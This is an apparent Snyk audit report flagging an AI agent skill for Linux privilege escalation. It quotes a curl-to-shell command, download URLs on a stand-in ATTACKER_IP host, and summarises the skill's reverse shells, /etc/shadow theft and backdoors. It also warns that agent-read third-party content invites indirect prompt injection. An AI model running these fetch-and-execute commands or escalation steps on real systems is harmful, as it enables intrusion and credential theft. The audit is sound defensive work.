linux-privilege-escalation
Fail
Audited by Snyk on Feb 28, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). Although GTFOBins and the cited GitHub projects are legitimate resources, the presence of attacker-controlled URLs (http://ATTACKER_IP:8000/linpeas.sh and http://ATTACKER_IP/exploit.c) and instructions to download and execute .sh/.c payloads from an untrusted host make this a high‑risk, suspicious download vector that could distribute malware.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). The content is explicitly malicious and high-risk: it provides step-by-step instructions to achieve unauthorized system compromise including privilege escalation, remote code execution (reverse shells), credential theft (/etc/shadow access and cracking), persistence/backdoors (SUID shells, cron/job hijacking, NFS no_root_squash, LD_PRELOAD), and guidance to host/transfer and run exploits from attacker-controlled servers.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The skill's Phase 2 "Automated Enumeration" explicitly instructs the agent to download and execute scripts from public GitHub URLs (e.g., curl -L https://github.com/.../linpeas.sh | sh) and to consult public resources like GTFOBins/exploit-db, which are untrusted third-party sources whose output the agent is expected to read and act on to choose exploitation steps.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill explicitly runs a remote script at runtime using: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh (and similar wget examples to fetch exploit.c or linpeas.sh), which fetches and directly executes remote code as part of the workflow.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to enumerate and exploit Linux systems to obtain root (kernel exploits, SUID abuse, sudo exploitation), modify system files (e.g., /etc/passwd, cron scripts), create setuid binaries and backdoors, and open reverse shells—directly guiding actions that compromise the host's state.